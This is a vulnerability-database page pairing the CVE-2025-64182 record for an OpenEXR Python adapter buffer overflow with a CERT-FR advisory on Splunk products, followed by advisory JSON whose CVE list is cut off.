Vulnerability-Lookup

CVE-2025-64182 (GCVE-0-2025-64182)

Vulnerability from cvelistv5 – Published: 2025-11-10 21:27 – Updated: 2025-11-14 19:22

Title

OpenEXR has buffer overflow in PyOpenEXR_old's channels() and channel()

Summary

OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.2.0 through 3.2.4, 3.3.0 through 3.3.5, and 3.4.0 through 3.4.2, a memory safety bug in the legacy OpenEXR Python adapter (the deprecated OpenEXR.InputFile wrapper) allow crashes and likely code execution when opening attacker-controlled EXR files or when passing crafted Python objects. Integer overflow and unchecked allocation in InputFile.channel() and InputFile.channels() can lead to heap overflow (32 bit) or a NULL deref (64 bit). Versions 3.2.5, 3.3.6, and 3.4.3 contain a patch for the issue.

Severity ?

5.5 (Medium)


                        
                          CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

CWE

CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	AcademySoftwareFoundation	openexr	Affected: >= 3.2.0, < 3.2.5 Affected: >= 3.3.0, < 3.3.6 Affected: >= 3.4.0, < 3.4.3

CERTFR-2026-AVI-0281

Vulnerability from certfr_avis - Published: 2026-03-12 - Updated: 2026-03-12

De multiples vulnérabilités ont été découvertes dans les produits Splunk. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une atteinte à la confidentialité des données et une injection de code indirecte à distance (XSS).

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
Splunk	Splunk AppDynamics Private Synthetic Agent	Splunk AppDynamics Private Synthetic Agent versions 26.1.x antérieures à 26.1.0
Splunk	Splunk AppDynamics On-Premises Enterprise Console	Splunk AppDynamics On-Premises Enterprise Console versions 26.1.x antérieures à 26.1.1
Splunk	Splunk AppDynamics Database Agent	Splunk AppDynamics Database Agent versions 26.1.x antérieures à 26.1.0
Splunk	Splunk Cloud Platform	Splunk Cloud Platform versions 10.0.2503 antérieures à 10.0.2503.12
Splunk	Splunk Cloud Platform	Splunk Cloud Platform versions 9.3.2411 antérieures à 9.3.2411.124
Splunk	Splunk Enterprise	Splunk Enterprise versions 9.4.x antérieures à 9.4.9
Splunk	Splunk Enterprise	Splunk Enterprise versions 10.2.x antérieures à 10.2.1
Splunk	Splunk AppDynamics NodeJS Agent	Splunk AppDynamics NodeJS Agent versions 25.12.x antérieures à 25.12.1
Splunk	Splunk Enterprise	Splunk Enterprise versions 10.0.x antérieures à 10.0.4
Splunk	Splunk Enterprise	Splunk Enterprise versions 9.3.x antérieures à 9.3.10
Splunk	Splunk Cloud Platform	Splunk Cloud Platform versions 10.1.2507 antérieures à 10.1.2507.17
Splunk	Splunk AppDynamics Java Agent	Splunk AppDynamics Java Agent versions 26.1.x antérieures à 26.1.0
Splunk	Splunk Cloud Platform	Splunk Cloud Platform versions 10.2.2510 antérieures à 10.2.2510.7

References

Title

Publication Time

Tags

Bulletin de sécurité Splunk SVD-2026-0302	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0311	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0308	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0309	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0305	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0310	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0304	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0301	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0313	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0306	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0303	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0307	2026-03-11	vendor-advisory
Bulletin de sécurité Splunk SVD-2026-0312	2026-03-11	vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Splunk AppDynamics Private Synthetic Agent versions 26.1.x ant\u00e9rieures \u00e0 26.1.0",
      "product": {
        "name": "Splunk AppDynamics Private Synthetic Agent",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk AppDynamics On-Premises Enterprise Console versions 26.1.x ant\u00e9rieures \u00e0 26.1.1",
      "product": {
        "name": "Splunk AppDynamics On-Premises Enterprise Console",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk AppDynamics Database Agent versions 26.1.x ant\u00e9rieures \u00e0 26.1.0",
      "product": {
        "name": "Splunk AppDynamics Database Agent",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk Cloud Platform versions 10.0.2503 ant\u00e9rieures \u00e0 10.0.2503.12",
      "product": {
        "name": "Splunk Cloud Platform",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk Cloud Platform versions 9.3.2411 ant\u00e9rieures \u00e0 9.3.2411.124",
      "product": {
        "name": "Splunk Cloud Platform",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk Enterprise versions 9.4.x ant\u00e9rieures \u00e0 9.4.9",
      "product": {
        "name": "Splunk Enterprise",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk Enterprise versions 10.2.x ant\u00e9rieures \u00e0 10.2.1",
      "product": {
        "name": "Splunk Enterprise",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk AppDynamics NodeJS Agent versions 25.12.x ant\u00e9rieures \u00e0 25.12.1",
      "product": {
        "name": "Splunk AppDynamics NodeJS Agent",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk Enterprise versions 10.0.x ant\u00e9rieures \u00e0 10.0.4",
      "product": {
        "name": "Splunk Enterprise",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk Enterprise versions 9.3.x ant\u00e9rieures \u00e0 9.3.10",
      "product": {
        "name": "Splunk Enterprise",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk Cloud Platform versions 10.1.2507 ant\u00e9rieures \u00e0 10.1.2507.17",
      "product": {
        "name": "Splunk Cloud Platform",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk AppDynamics Java Agent versions 26.1.x ant\u00e9rieures \u00e0 26.1.0",
      "product": {
        "name": "Splunk AppDynamics Java Agent",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    },
    {
      "description": "Splunk Cloud Platform versions 10.2.2510 ant\u00e9rieures \u00e0 10.2.2510.7",
      "product": {
        "name": "Splunk Cloud Platform",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2025-6395",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-6395"
    },
    {
      "name": "CVE-2018-16864",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-16864"
    },
    {
      "name": "CVE-2025-48073",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48073"
    },
    {
      "name": "CVE-2025-31651",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31651"
    },
    {
      "name": "CVE-2025-11219",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11219"
    },
    {
      "name": "CVE-2026-21933",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-21933"
    },
    {
      "name": "CVE-2025-58183",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
    },
    {
      "name": "CVE-2026-21932",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-21932"
    },
    {
      "name": "CVE-2025-66199",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-66199"
    },
    {
      "name": "CVE-2025-53042",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53042"
    },
    {
      "name": "CVE-2025-9231",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9231"
    },
    {
      "name": "CVE-2025-1594",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-1594"
    },
    {
      "name": "CVE-2025-3887",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-3887"
    },
    {
      "name": "CVE-2025-68973",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-68973"
    },
    {
      "name": "CVE-2025-4574",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-4574"
    },
    {
      "name": "CVE-2025-9714",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9714"
    },
    {
      "name": "CVE-2025-10148",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-10148"
    },
    {
      "name": "CVE-2025-14087",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-14087"
    },
    {
      "name": "CVE-2025-12433",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12433"
    },
    {
      "name": "CVE-2025-12444",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12444"
    },
    {
      "name": "CVE-2023-33201",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-33201"
    },
    {
      "name": "CVE-2024-38286",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-38286"
    },
    {
      "name": "CVE-2025-11213",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11213"
    },
    {
      "name": "CVE-2025-8556",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-8556"
    },
    {
      "name": "CVE-2025-22872",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22872"
    },
    {
      "name": "CVE-2025-12036",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12036"
    },
    {
      "name": "CVE-2012-0871",
      "url": "https://www.cve.org/CVERecord?id=CVE-2012-0871"
    },
    {
      "name": "CVE-2025-4056",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-4056"
    },
    {
      "name": "CVE-2025-0913",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-0913"
    },
    {
      "name": "CVE-2025-53062",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53062"
    },
    {
      "name": "CVE-2025-0518",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-0518"
    },
    {
      "name": "CVE-2025-69223",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69223"
    },
    {
      "name": "CVE-2025-47907",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
    },
    {
      "name": "CVE-2025-12084",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12084"
    },
    {
      "name": "CVE-2018-15688",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-15688"
    },
    {
      "name": "CVE-2025-45582",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-45582"
    },
    {
      "name": "CVE-2025-12438",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12438"
    },
    {
      "name": "CVE-2025-6069",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
    },
    {
      "name": "CVE-2023-26464",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-26464"
    },
    {
      "name": "CVE-2025-69419",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69419"
    },
    {
      "name": "CVE-2025-24813",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-24813"
    },
    {
      "name": "CVE-2025-12435",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12435"
    },
    {
      "name": "CVE-2025-6075",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-6075"
    },
    {
      "name": "CVE-2013-4394",
      "url": "https://www.cve.org/CVERecord?id=CVE-2013-4394"
    },
    {
      "name": "CVE-2019-20386",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-20386"
    },
    {
      "name": "CVE-2025-64183",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-64183"
    },
    {
      "name": "CVE-2025-13226",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-13226"
    },
    {
      "name": "CVE-2025-58185",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58185"
    },
    {
      "name": "CVE-2025-47808",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47808"
    },
    {
      "name": "CVE-2021-46877",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-46877"
    },
    {
      "name": "CVE-2026-2391",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-2391"
    },
    {
      "name": "CVE-2017-18078",
      "url": "https://www.cve.org/CVERecord?id=CVE-2017-18078"
    },
    {
      "name": "CVE-2025-55752",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-55752"
    },
    {
      "name": "CVE-2025-53905",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53905"
    },
    {
      "name": "CVE-2019-17571",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-17571"
    },
    {
      "name": "CVE-2025-11207",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11207"
    },
    {
      "name": "CVE-2021-35939",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-35939"
    },
    {
      "name": "CVE-2025-13223",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-13223"
    },
    {
      "name": "CVE-2025-12431",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12431"
    },
    {
      "name": "CVE-2026-23745",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-23745"
    },
    {
      "name": "CVE-2025-15467",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-15467"
    },
    {
      "name": "CVE-2024-58251",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-58251"
    },
    {
      "name": "CVE-2025-9820",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9820"
    },
    {
      "name": "CVE-2024-7246",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-7246"
    },
    {
      "name": "CVE-2025-4598",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-4598"
    },
    {
      "name": "CVE-2026-21226",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-21226"
    },
    {
      "name": "CVE-2023-44487",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
    },
    {
      "name": "CVE-2024-29857",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
    },
    {
      "name": "CVE-2023-33202",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-33202"
    },
    {
      "name": "CVE-2025-12726",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12726"
    },
    {
      "name": "CVE-2025-12445",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12445"
    },
    {
      "name": "CVE-2025-12437",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12437"
    },
    {
      "name": "CVE-2025-15284",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-15284"
    },
    {
      "name": "CVE-2025-69230",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69230"
    },
    {
      "name": "CVE-2025-49125",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-49125"
    },
    {
      "name": "CVE-2025-50106",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
    },
    {
      "name": "CVE-2025-14512",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-14512"
    },
    {
      "name": "CVE-2025-58057",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
    },
    {
      "name": "CVE-2025-8291",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-8291"
    },
    {
      "name": "CVE-2026-22795",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-22795"
    },
    {
      "name": "CVE-2026-21925",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-21925"
    },
    {
      "name": "CVE-2025-0716",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-0716"
    },
    {
      "name": "CVE-2025-64718",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-64718"
    },
    {
      "name": "CVE-2025-30754",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
    },
    {
      "name": "CVE-2025-12434",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12434"
    },
    {
      "name": "CVE-2025-69225",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69225"
    },
    {
      "name": "CVE-2025-47910",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47910"
    },
    {
      "name": "CVE-2025-12439",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12439"
    },
    {
      "name": "CVE-2018-16865",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-16865"
    },
    {
      "name": "CVE-2025-14874",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-14874"
    },
    {
      "name": "CVE-2020-17521",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-17521"
    },
    {
      "name": "CVE-2024-54677",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-54677"
    },
    {
      "name": "CVE-2025-48072",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48072"
    },
    {
      "name": "CVE-2024-51744",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
    },
    {
      "name": "CVE-2023-48795",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-48795"
    },
    {
      "name": "CVE-2025-12432",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12432"
    },
    {
      "name": "CVE-2025-6965",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-6965"
    },
    {
      "name": "CVE-2025-10966",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-10966"
    },
    {
      "name": "CVE-2025-47906",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
    },
    {
      "name": "CVE-2026-20165",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-20165"
    },
    {
      "name": "CVE-2025-59375",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-59375"
    },
    {
      "name": "CVE-2025-22919",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22919"
    },
    {
      "name": "CVE-2024-23672",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-23672"
    },
    {
      "name": "CVE-2025-69227",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69227"
    },
    {
      "name": "CVE-2021-33910",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-33910"
    },
    {
      "name": "CVE-2025-69421",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69421"
    },
    {
      "name": "CVE-2025-58188",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58188"
    },
    {
      "name": "CVE-2025-48964",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48964"
    },
    {
      "name": "CVE-2025-12443",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12443"
    },
    {
      "name": "CVE-2025-4565",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-4565"
    },
    {
      "name": "CVE-2024-56433",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-56433"
    },
    {
      "name": "CVE-2023-6602",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-6602"
    },
    {
      "name": "CVE-2025-11215",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11215"
    },
    {
      "name": "CVE-2013-4393",
      "url": "https://www.cve.org/CVERecord?id=CVE-2013-4393"
    },
    {
      "name": "CVE-2019-3842",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-3842"
    },
    {
      "name": "CVE-2025-11205",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11205"
    },
    {
      "name": "CVE-2025-55754",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-55754"
    },
    {
      "name": "CVE-2025-12725",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12725"
    },
    {
      "name": "CVE-2022-23305",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-23305"
    },
    {
      "name": "CVE-2025-11208",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11208"
    },
    {
      "name": "CVE-2025-68161",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-68161"
    },
    {
      "name": "CVE-2024-8372",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-8372"
    },
    {
      "name": "CVE-2025-22868",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
    },
    {
      "name": "CVE-2024-56337",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-56337"
    },
    {
      "name": "CVE-2025-3360",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-3360"
    },
    {
      "name": "CVE-2026-22796",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-22796"
    },
    {
      "name": "CVE-2025-11756",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11756"
    },
    {
      "name": "CVE-2025-59730",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-59730"
    },
    {
      "name": "CVE-2025-61724",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-61724"
    },
    {
      "name": "CVE-2024-5642",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-5642"
    },
    {
      "name": "CVE-2020-13776",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-13776"
    },
    {
      "name": "CVE-2025-13033",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-13033"
    },
    {
      "name": "CVE-2022-23307",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-23307"
    },
    {
      "name": "CVE-2025-61723",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-61723"
    },
    {
      "name": "CVE-2025-9232",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
    },
    {
      "name": "CVE-2025-11212",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11212"
    },
    {
      "name": "CVE-2025-12495",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12495"
    },
    {
      "name": "CVE-2025-61795",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-61795"
    },
    {
      "name": "CVE-2025-46394",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-46394"
    },
    {
      "name": "CVE-2021-35937",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-35937"
    },
    {
      "name": "CVE-2025-12840",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12840"
    },
    {
      "name": "CVE-2025-52520",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-52520"
    },
    {
      "name": "CVE-2025-61725",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-61725"
    },
    {
      "name": "CVE-2025-55163",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-55163"
    },
    {
      "name": "CVE-2025-11458",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11458"
    },
    {
      "name": "CVE-2020-1712",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-1712"
    },
    {
      "name": "CVE-2025-32990",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-32990"
    },
    {
      "name": "CVE-2025-12429",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12429"
    },
    {
      "name": "CVE-2026-20164",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-20164"
    },
    {
      "name": "CVE-2025-48989",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48989"
    },
    {
      "name": "CVE-2026-24842",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-24842"
    },
    {
      "name": "CVE-2025-11211",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11211"
    },
    {
      "name": "CVE-2025-32989",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-32989"
    },
    {
      "name": "CVE-2025-22874",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
    },
    {
      "name": "CVE-2025-53069",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53069"
    },
    {
      "name": "CVE-2026-23950",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-23950"
    },
    {
      "name": "CVE-2023-26118",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-26118"
    },
    {
      "name": "CVE-2025-50059",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-50059"
    },
    {
      "name": "CVE-2025-69228",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69228"
    },
    {
      "name": "CVE-2025-59250",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-59250"
    },
    {
      "name": "CVE-2025-14104",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-14104"
    },
    {
      "name": "CVE-2025-53044",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53044"
    },
    {
      "name": "CVE-2025-47807",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47807"
    },
    {
      "name": "CVE-2025-47806",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47806"
    },
    {
      "name": "CVE-2025-47912",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47912"
    },
    {
      "name": "CVE-2025-64182",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-64182"
    },
    {
      "name": "CVE-2023-52428",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-52428"
    },
    {
      "name": "CVE-2023-6604",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-6604"
    },
    {
      "name": "CVE-2025-48988",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48988"
    },
    {
      "name": "CVE-2025-68160",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-68160"
    },
    {
      "name": "CVE-2022-3821",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-3821"
    },
    {
      "name": "CVE-2017-9217",
      "url": "https://www.cve.org/CVERecord?id=CVE-2017-9217"
    },
    {
      "name": "CVE-2025-60753",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-60753"
    },
    {
      "name": "CVE-2025-64181",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-64181"
    },
    {
      "name": "CVE-2025-67735",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-67735"
    },
    {
      "name": "CVE-2025-12436",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12436"
    },
    {
      "name": "CVE-2022-42004",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-42004"
    },
    {
      "name": "CVE-2025-13230",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-13230"
    },
    {
      "name": "CVE-2013-4327",
      "url": "https://www.cve.org/CVERecord?id=CVE-2013-4327"
    },
    {
      "name": "CVE-2025-58186",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58186"
    },
    {
      "name": "CVE-2025-9086",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9086"
    },
    {
      "name": "CVE-2025-12446",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12446"
    },
    {
      "name": "CVE-2025-13228",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-13228"
    },
    {
      "name": "CVE-2013-4391",
      "url": "https://www.cve.org/CVERecord?id=CVE-2013-4391"
    },
    {
      "name": "CVE-2026-20166",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-20166"
    },
    {
      "name": "CVE-2025-58187",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58187"
    },
    {
      "name": "CVE-2025-12441",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12441"
    },
    {
      "name": "CVE-2024-29371",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29371"
    },
    {
      "name": "CVE-2025-47183",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47183"
    },
    {
      "name": "CVE-2025-13601",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-13601"
    },
    {
      "name": "CVE-2025-4673",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
    },
    {
      "name": "CVE-2023-6601",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-6601"
    },
    {
      "name": "CVE-2018-16888",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-16888"
    },
    {
      "name": "CVE-2025-58056",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
    },
    {
      "name": "CVE-2025-22871",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
    },
    {
      "name": "CVE-2025-69226",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-69226"
    },
    {
      "name": "CVE-2025-32988",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-32988"
    },
    {
      "name": "CVE-2025-13224",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-13224"
    },
    {
      "name": "CVE-2025-13042",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-13042"
    },
    {
      "name": "CVE-2024-34750",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-34750"
    },
    {
      "name": "CVE-2025-11460",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-11460"
    },
    {
      "name": "CVE-2024-47081",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-47081"
    },
    {
      "name": "CVE-2025-47913",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47913"
    },
    {
      "name": "CVE-2025-13229",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-13229"
    },
    {
      "name": "CVE-2024-24549",
